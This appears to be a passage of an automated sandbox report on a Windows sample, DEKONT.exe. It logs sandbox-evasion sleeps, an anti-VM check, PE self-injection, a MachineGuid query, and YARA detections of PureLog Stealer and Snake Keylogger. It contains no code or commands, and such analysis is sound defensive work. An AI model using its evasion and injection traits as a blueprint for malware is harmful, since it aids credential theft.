Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR

Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 17F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 3400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 8140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 9140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 92F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: A2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: A880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: B880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: C880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594235	Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe	Window / User API: threadDelayed 2109			Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Window / User API: threadDelayed 7718			Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe TID: 7404	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7692	Thread sleep count: 2109 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7692	Thread sleep count: 7718 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe TID: 7648	Thread sleep time: -594235s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Thread delayed: delay time: 594235	Jump to behavior

Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000000.00000002.1373034560.0000000003210000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: bWhgfsRR8y
Source: DEKONT.exe, 00000003.00000002.3819986025.0000000001156000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll50a3

Source: C:\Users\user\Desktop\DEKONT.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe

Code function: 3_2_05B2BE28 LdrInitializeThunk,

3_2_05B2BE28

Source: C:\Users\user\Desktop\DEKONT.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DEKONT.exe

Memory written: C:\Users\user\Desktop\DEKONT.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe

Process created: C:\Users\user\Desktop\DEKONT.exe "C:\Users\user\Desktop\DEKONT.exe"

Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Users\user\Desktop\DEKONT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Users\user\Desktop\DEKONT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DEKONT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.DEKONT.exe.4409970.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4409970.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5b20000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1378528073.0000000005B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1375703382.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
